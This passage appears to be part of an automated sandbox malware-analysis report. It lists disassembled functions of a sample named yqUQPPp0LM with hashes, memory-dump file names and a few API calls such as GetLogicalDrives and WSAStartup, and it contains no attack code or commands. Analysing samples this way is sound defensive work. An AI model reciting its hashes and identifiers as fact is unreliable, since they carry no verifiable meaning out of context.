                                        • Opcode ID: f170f58c70f1a58c40ccf0f6389a4147653fa48a8a5edf59e1cb2589030bcfca
                                        • Instruction ID: da9ae8d9d1c2de74b9067caa76358d558f01eee731899e8a79fdd8a597b31c67
                                        • Opcode Fuzzy Hash: f170f58c70f1a58c40ccf0f6389a4147653fa48a8a5edf59e1cb2589030bcfca
                                        • Instruction Fuzzy Hash: 32716DEB15C121BD710284952B54BFA676EE5C7730B31883BF807D6692E2E54E4F11B1
                                        Function 074000A2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 390COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: d287d62ef938ce7eb4a43442b8be8ffc99fcf5943958f249cbbea7189a047401
                                        • Instruction ID: a95e8bba3d2131c56ecde446ef35830b89e25d50c7101c6e011e7bbf1c0cc73c
                                        • Opcode Fuzzy Hash: d287d62ef938ce7eb4a43442b8be8ffc99fcf5943958f249cbbea7189a047401
                                        • Instruction Fuzzy Hash: 9F717CEB19C121BDB102C4952B54BFA676EE5C7730B31883BF807D6692E2E54E4F11B1
                                        Function 074000B8 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 383COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: c4e989a336fee5018e01ec805af9d7d402c4214d4cb6c37b8fa9880bcefaa0e0
                                        • Instruction ID: 179cc40f5ae7633f78e4b69716eef5d0eb652c92be2c6ab155403a8a286a01c3
                                        • Opcode Fuzzy Hash: c4e989a336fee5018e01ec805af9d7d402c4214d4cb6c37b8fa9880bcefaa0e0
                                        • Instruction Fuzzy Hash: 37716CEB19C121BEB102C4952B54BFA676EE5C7730B31883BF807D6592E2A54E4B11B2
                                        Function 074000C9 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 382COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: b4d5404abfa037aed5d0cbe6ca9053ea5d07ab2a76d00ca0669583e25523c42a
                                        • Instruction ID: 68db986711a7dd9b8da0265213cf0a119d8fe9940c37c187d42ea1dcc86c0e49
                                        • Opcode Fuzzy Hash: b4d5404abfa037aed5d0cbe6ca9053ea5d07ab2a76d00ca0669583e25523c42a
                                        • Instruction Fuzzy Hash: 7F716CEB19C121BEB102C4952B54BFB676EE5C7730B31883BF807D6592E2E54E4B11B1
                                        Function 074000D8 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 379COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: ca9b3f249deea56b1f83e05bb78584795179fc9141a1eb318d4f687686cb6280
                                        • Instruction ID: c985ae25e606f23980213ea5aecfb636763ed48302ca8551bcfdb4bfdf3305ad
                                        • Opcode Fuzzy Hash: ca9b3f249deea56b1f83e05bb78584795179fc9141a1eb318d4f687686cb6280
                                        • Instruction Fuzzy Hash: D9716CEB19C121BEB102C4952B54BFB676EE5C7730B31883BF807D6592E2E54E4A11B1
                                        Function 074000F3 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 372COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: 19bc33349121e96bb0c25be447478df9bc4147b839f9b5355d3e525266549a5d
                                        • Instruction ID: 7fd9466eab3c1be9f526539264140ce6cdcc1baad4250b8b3f3172d1e9767874
                                        • Opcode Fuzzy Hash: 19bc33349121e96bb0c25be447478df9bc4147b839f9b5355d3e525266549a5d
                                        • Instruction Fuzzy Hash: 62716EEB15C111BE7102C4952B54BFB676EE5C7730B31883BF807D6692E2A94E4F11B1
                                        Function 0740011B Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 351COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: 332a0a7b0f9f86ff3396677f13ae7527d568c8fdab592d79f907cda11c4772df
                                        • Instruction ID: 7c5885253e85fe5152db694f532388c37bc195509f34c9ce5a1edc4023e5459e
                                        • Opcode Fuzzy Hash: 332a0a7b0f9f86ff3396677f13ae7527d568c8fdab592d79f907cda11c4772df
                                        • Instruction Fuzzy Hash: 2C6190FB15C121BEB202C4952B50BFA676EE5C7730B31883BF807C6692E2B54A4F11B1
                                        Function 07400138 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 338COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: 5bdd3430a4ae785b198ddcbd272a625b556ec89f610a1a96f96e726cdfd791a7
                                        • Instruction ID: 97cf930617b6be01b1635d5569462e7c39e11fdfb7b67dd1e07e0d67823d80eb
                                        • Opcode Fuzzy Hash: 5bdd3430a4ae785b198ddcbd272a625b556ec89f610a1a96f96e726cdfd791a7
                                        • Instruction Fuzzy Hash: 1B619EEB15C151BEB202C4952B54BFA676EE5C7730B31883BF807C6692E2B40E4F12B1
                                        Function 074001D7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 332COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: e767e9712449339c6d0b551f8bbd38e78c6f50af8add3cdc53a9314b4004d92e
                                        • Instruction ID: e235e458d29e258ad15f9174cc862c0da14f879173c8aae36270bfbba3658100
                                        • Opcode Fuzzy Hash: e767e9712449339c6d0b551f8bbd38e78c6f50af8add3cdc53a9314b4004d92e
                                        • Instruction Fuzzy Hash: 4B619FEB15C111BE7202C5956B50BFB676EE5C7730B31883BF807D66A2E2B44E4B11B1
                                        Function 07400176 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 328COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: 17e8996fe42fc5635762668ab60b5c006d6a0f661859468707bcf28bae368178
                                        • Instruction ID: 04317f15e63ea70f0f78616732377de9452e3e36022a754d45b032963726c85a
                                        • Opcode Fuzzy Hash: 17e8996fe42fc5635762668ab60b5c006d6a0f661859468707bcf28bae368178
                                        • Instruction Fuzzy Hash: 05519DEB15C111BEB202C5956B50BFB676EE5C7730B31883BF807D6692E2B40E4B11B2
                                        Function 074001A6 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 324COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: c5f3773db293fa4fbc743059ef4239fc87b2c964ea57c113646654877cb04a20
                                        • Instruction ID: c3a830368fb2cdbe0a505214c4b07b1eaca75e1c91a0f2d49a4eaef85d0cd44f
                                        • Opcode Fuzzy Hash: c5f3773db293fa4fbc743059ef4239fc87b2c964ea57c113646654877cb04a20
                                        • Instruction Fuzzy Hash: BE518FEB15C161BEB202C4952B54BFB676EE5C7730731883BF807D6692E2A40E4F11B2
                                        Function 07400205 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 317COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: 42f95060c9047d53c5cd8aa786c827a949b1aef2fb7ddaa8ba1fc0de44ea9fb4
                                        • Instruction ID: f22458c9532b12f2d37594d8e5e2bfe9f3d55d772bf8408e7a167a3ff907d37f
                                        • Opcode Fuzzy Hash: 42f95060c9047d53c5cd8aa786c827a949b1aef2fb7ddaa8ba1fc0de44ea9fb4
                                        • Instruction Fuzzy Hash: 8551AFEB15C111BE7202C0952B50BFB5B6EE5D7730B31883BF807C6692E2A80E4F11B2
                                        Function 0740019D Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLogicalDrives.KERNELBASE ref: 07400330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: DrivesLogical
                                        • String ID: A:\$A:\
                                        • API String ID: 999431828-1047444362
                                        • Opcode ID: 6c437d874e7d3730cf30938896bd25641acf613d6d6d4227ae458a8669150876
                                        • Instruction ID: 199c1ef71aad514000baf34a4e0bc0d8791ea3028393abc03850d3be5161b6c0
                                        • Opcode Fuzzy Hash: 6c437d874e7d3730cf30938896bd25641acf613d6d6d4227ae458a8669150876
                                        • Instruction Fuzzy Hash: 54516DEB15C121BE7102C4952B54BFA676EE5C7730B31883BF807D6692E2E44E4F11B2
                                        Function 074001BB Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 311COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLogicalDrives.KERNELBASE ref: 07400330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: DrivesLogical
                                        • String ID: A:\$A:\
                                        • API String ID: 999431828-1047444362
                                        • Opcode ID: b573f50946cee29a0788227de347c456bdedb6c8115f3464fc4e597a1de53579
                                        • Instruction ID: 4b2a7ea710563b2e93bd3e94144e5d43477f4dbc2edab69a849ee165a1a27aa6
                                        • Opcode Fuzzy Hash: b573f50946cee29a0788227de347c456bdedb6c8115f3464fc4e597a1de53579
                                        • Instruction Fuzzy Hash: F7517DEB15C111BEB102C4952B54BFA676EE5C7730B31883BF807D6692E2E44E4F11B2
                                        Function 074001F0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 303COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLogicalDrives.KERNELBASE ref: 07400330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: DrivesLogical
                                        • String ID: A:\$A:\
                                        • API String ID: 999431828-1047444362
                                        • Opcode ID: 5864a8e7482cc4743bc4c44b701640786eeff3d1bc7759d9c1399d571e6cca62
                                        • Instruction ID: 4fe538d12e66e4078aba6f044d3f9a0d901604ce99083ad2bca9ceef3cf0b2bf
                                        • Opcode Fuzzy Hash: 5864a8e7482cc4743bc4c44b701640786eeff3d1bc7759d9c1399d571e6cca62
                                        • Instruction Fuzzy Hash: 62516BEB25C121BE7102D0962B54BFB576EE5C7730B31883BF807D6592E2E40E4E11B2
                                        Function 07400228 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 289COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLogicalDrives.KERNELBASE ref: 07400330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: DrivesLogical
                                        • String ID: A:\$A:\
                                        • API String ID: 999431828-1047444362
                                        • Opcode ID: a4ef6527782663dfd0c5ac1c224103fbed4caa37fbc6e3b9f81962d022bf4f61
                                        • Instruction ID: f69599e2e3a5e4b4a6ba42b2e89e26890c4c3bc5e4eac34b7526f6592272c2d6
                                        • Opcode Fuzzy Hash: a4ef6527782663dfd0c5ac1c224103fbed4caa37fbc6e3b9f81962d022bf4f61
                                        • Instruction Fuzzy Hash: 73517EEB25C121BEB202C4952B54BFB576EE5C7730731883BF807C6592E2E40E4E11B2
                                        Function 07400239 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 288COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLogicalDrives.KERNELBASE ref: 07400330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: DrivesLogical
                                        • String ID: A:\$A:\
                                        • API String ID: 999431828-1047444362
                                        • Opcode ID: 0754e601d3c3fa0bf9f0971553cb6d9056dd2f11886edf5ea0b82e891efa24f3
                                        • Instruction ID: 94c49f11cd8e80f1723fb5f7dd7d5744f6315b716e87eae4cc1721cf958baf7a
                                        • Opcode Fuzzy Hash: 0754e601d3c3fa0bf9f0971553cb6d9056dd2f11886edf5ea0b82e891efa24f3
                                        • Instruction Fuzzy Hash: 7E518FEB25C121BEB202D4962B50BFB676EE5C7730731883BF807C6592E2E44A4E11B1
                                        Function 00BB8E90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: _open
                                        • String ID: terminated$@
                                        • API String ID: 4183159743-3016906910
                                        • Opcode ID: 1aa3bb8359e6f341223c0a2a7acb2bf69ce2013578d7a9272f543082f64e764e
                                        • Instruction ID: e6d1194efc40b0ae773c21d0cc8b07dc4ebd4ea504f1a1b13aab8896aa2ee24e
                                        • Opcode Fuzzy Hash: 1aa3bb8359e6f341223c0a2a7acb2bf69ce2013578d7a9272f543082f64e764e
                                        • Instruction Fuzzy Hash: CD414AB09083059FDB00EF79D8807AEBBE4EB89314F048A2DE898D7391E774D845DB56
                                        Function 0086A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                        Download Yara Rule
                                        APIs
                                        • getsockname.WS2_32(?,?,00000080), ref: 0086A1C7
                                        Strings
                                        • getsockname() failed with errno %d: %s, xrefs: 0086A1F0
                                        • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0086A23B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: getsockname
                                        • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                        • API String ID: 3358416759-2605427207
                                        • Opcode ID: e913ff6535180db8aec7364022e5da7838dc24324b556776364f6e40cede6c84
                                        • Instruction ID: 4329415dd850bc29c3cde7bf0e23f8c1ccf093258bd4d306eb78223f9a2dce17
                                        • Opcode Fuzzy Hash: e913ff6535180db8aec7364022e5da7838dc24324b556776364f6e40cede6c84
                                        • Instruction Fuzzy Hash: 8721FB31848784A6F6259718DC42FE773ACFF91328F040654F998A3151FB3259858AD3
                                        Function 0084D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WSAStartup.WS2_32(00000202), ref: 0084D65B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: Startup
                                        • String ID: if_nametoindex$iphlpapi.dll
                                        • API String ID: 724789610-3097795196
                                        • Opcode ID: 09df29c35a54ca4363dc1fc347145678228afbb3556606e0d135556b6a5db419
                                        • Instruction ID: aed7f89db8a9c29396f75f2f306b42dd7e0039e84661af934e2325ecef23b822
                                        • Opcode Fuzzy Hash: 09df29c35a54ca4363dc1fc347145678228afbb3556606e0d135556b6a5db419
                                        • Instruction Fuzzy Hash: 4D0126D0A4034A46EB51BB38AC173663594BB61304F8A1569EC8CD22D2F66DC58CC2E3
                                        Function 07400309 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 234COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLogicalDrives.KERNELBASE ref: 07400330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: DrivesLogical
                                        • String ID: A:\
                                        • API String ID: 999431828-3379428675
                                        • Opcode ID: cdba037fc6516dc8629cf5f143ccce8040b13aa28227f080c927ff310ef7473d
                                        • Instruction ID: 0717afd15c9b3d4766ff799e82fe55d362fcd47b00b2d49f6a934cac79a226a1
                                        • Opcode Fuzzy Hash: cdba037fc6516dc8629cf5f143ccce8040b13aa28227f080c927ff310ef7473d
                                        • Instruction Fuzzy Hash: 3E41B2EB19C111BEB20290952B50BFB676EE5C7730B318C37F407C6692E2E44A4B51B1
                                        Function 074002A5 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 228COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLogicalDrives.KERNELBASE ref: 07400330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: DrivesLogical
                                        • String ID: A:\
                                        • API String ID: 999431828-3379428675
                                        • Opcode ID: dafcf914d567bc94394dc8cf4db3bf6b1bf0215ed39a659d9ff6204aab6c0e43
                                        • Instruction ID: 19ab0464fa50add99bd0a2803dd96990eedeb3144f51e7811cb28cfc0b8904ac
                                        • Opcode Fuzzy Hash: dafcf914d567bc94394dc8cf4db3bf6b1bf0215ed39a659d9ff6204aab6c0e43
                                        • Instruction Fuzzy Hash: 6941AFEB19C111BEB20290956B50BFB676EE5C7730B318C37F807D6692E2F44A4B11B2
                                        Function 074002C6 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 220COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLogicalDrives.KERNELBASE ref: 07400330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: DrivesLogical
                                        • String ID: A:\
                                        • API String ID: 999431828-3379428675
                                        • Opcode ID: d4f0c8db729da7061d60696b1df9de7e9753647359ae00cab5c1b601c374972b
                                        • Instruction ID: 53ce1ca34db2bee33ae317af966a019268865a5e7c57c3ef118081eb06b3b279
                                        • Opcode Fuzzy Hash: d4f0c8db729da7061d60696b1df9de7e9753647359ae00cab5c1b601c374972b
                                        • Instruction Fuzzy Hash: 2141E2EB19C110BEB202C5956B50BFA6B6EE5C7730B318C3BF407C6592E2F44A4B51B2
                                        Function 07400325 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLogicalDrives.KERNELBASE ref: 07400330
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: DrivesLogical
                                        • String ID: A:\
                                        • API String ID: 999431828-3379428675
                                        • Opcode ID: b84d0bbaed165ec9f10b6e888bae0313db308b7800e1e7df255aa07d90712775
                                        • Instruction ID: bfe5bac2d3bbd14eecfa4a9708e2ed9dbe33ebd753cf46d35dc5200d3d62125e
                                        • Opcode Fuzzy Hash: b84d0bbaed165ec9f10b6e888bae0313db308b7800e1e7df255aa07d90712775
                                        • Instruction Fuzzy Hash: 3831A0EB268111BEB202D0952B50BFB576EE5C7730B318C37F807C6692E2F44A4B51B5
                                        Function 0083F7B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
